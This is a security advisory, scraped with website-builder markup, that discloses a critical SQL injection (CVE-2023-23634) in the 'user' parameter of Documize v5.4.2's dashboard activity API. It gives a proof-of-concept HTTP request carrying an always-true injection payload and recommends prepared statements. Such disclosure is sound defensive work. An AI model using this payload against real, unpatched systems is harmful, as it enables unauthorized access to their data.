[et_pb_section fb_built=\"1\" _builder_version=\"4.21.0\" _module_preset=\"default\" background_color=\"#2E353D\" custom_padding=\"||0px|||\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_row _builder_version=\"4.21.0\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_column type=\"4_4\" _builder_version=\"4.21.0\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_text _builder_version=\"4.23.1\" _module_preset=\"default\" custom_padding=\"||13px|||\" hover_enabled=\"0\" global_colors_info=\"{}\" theme_builder_area=\"post_content\" sticky_enabled=\"0\"]<\/p>\n
Advisory ID<\/strong>: usd-2022-0066 The user<\/strong> parameter of the \/api\/dashboard\/activity<\/strong> allows SQL-Injection.<\/p>\n The following request was used to inject data into the SQL<\/em> query using the user<\/strong> parameter.<\/p>\n It is recommended to use prepared statements.<\/p>\n
Product<\/strong>: Documize
Affected Version<\/strong>: v5.4.2 (221021105923)
Vulnerability Type<\/strong>: SQL Injection (CWE-89)
Security Risk<\/strong>: Critical
Vendor URL<\/strong>: https:\/\/www.documize.com<\/a>
Vendor Status<\/strong>: Not fixed
CVE number<\/strong>: CVE-2023-23634<\/p>\nDescription<\/h3>\n
Proof of Concept<\/h3>\n
<\/span>GET<\/span> \/api\/dashboard\/activity?days=1&user=invalid'%20or%20'1'%3d'1&activity=0<\/span> HTTP<\/span>\/<\/span>1.1<\/span>
Host<\/span>:<\/span> localhost:5001<\/span>
Accept<\/span>:<\/span> application\/json, text\/javascript, *\/*; q=0.01<\/span>
Content-Type<\/span>:<\/span> application\/x-www-form-urlencoded; charset=UTF-8<\/span>
authorization<\/span>:<\/span> ey[REDACTED]<\/span>
User-Agent<\/span>:<\/span> Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/108.0.5359.99 Safari\/537.36<\/span>
[...]<\/span><\/pre>\n<\/div>\nFix<\/h3>\n
References<\/h3>\n